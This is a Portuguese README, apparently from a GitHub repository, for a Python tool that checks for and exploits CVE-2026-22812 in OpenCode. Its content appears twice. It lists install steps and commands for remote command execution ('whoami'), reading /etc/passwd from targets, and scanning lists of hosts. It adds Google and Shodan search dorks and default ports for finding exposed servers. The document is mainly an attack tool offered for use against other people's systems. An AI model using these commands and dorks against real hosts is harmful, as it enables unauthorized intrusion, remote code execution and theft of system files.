
Ferramenta em Python para verificar e explorar o CVE-2026-22812 no OpenCode, com suporte a execução de comandos, leitura de arquivos e varredura de múltiplos alvos nas portas 4095-4100.
OpenCode CVE-2026-22812 Exploiter Ferramentas Python simples para verificar e explorar a vulnerabilidade do OpenCode (CVE-2026-22812).
Instalação
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
Uso Básico
# Verificar alvo único
python rce.py -u http://target:4096 --check
# Executar comando
python rce.py -u http://target:4096 -c "whoami"
# Ler arquivo
python rce.py -u http://target:4096 --read-file /etc/passwd
# Escanear múltiplos alvos
python rce.py -l targets.txt --check
# Outros
python rce.py --help
Dorks de Busca
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
Portas Padrão: 4095-4100
Ferramentas Python simples para verificar e explorar a vulnerabilidade do OpenCode (CVE-2026-22812).
Instalação:
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
Uso Básico
# Verificar alvo único
python rce.py -u http://target:4096 --check
# Executar comando
python rce.py -u http://target:4096 -c "whoami"
# Ler arquivo
python rce.py -u http://target:4096 --read-file /etc/passwd
# Escanear múltiplos alvos
python rce.py -l targets.txt --check
# Outros
Dorks de Busca:
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
Portas Padrão: 4095-4100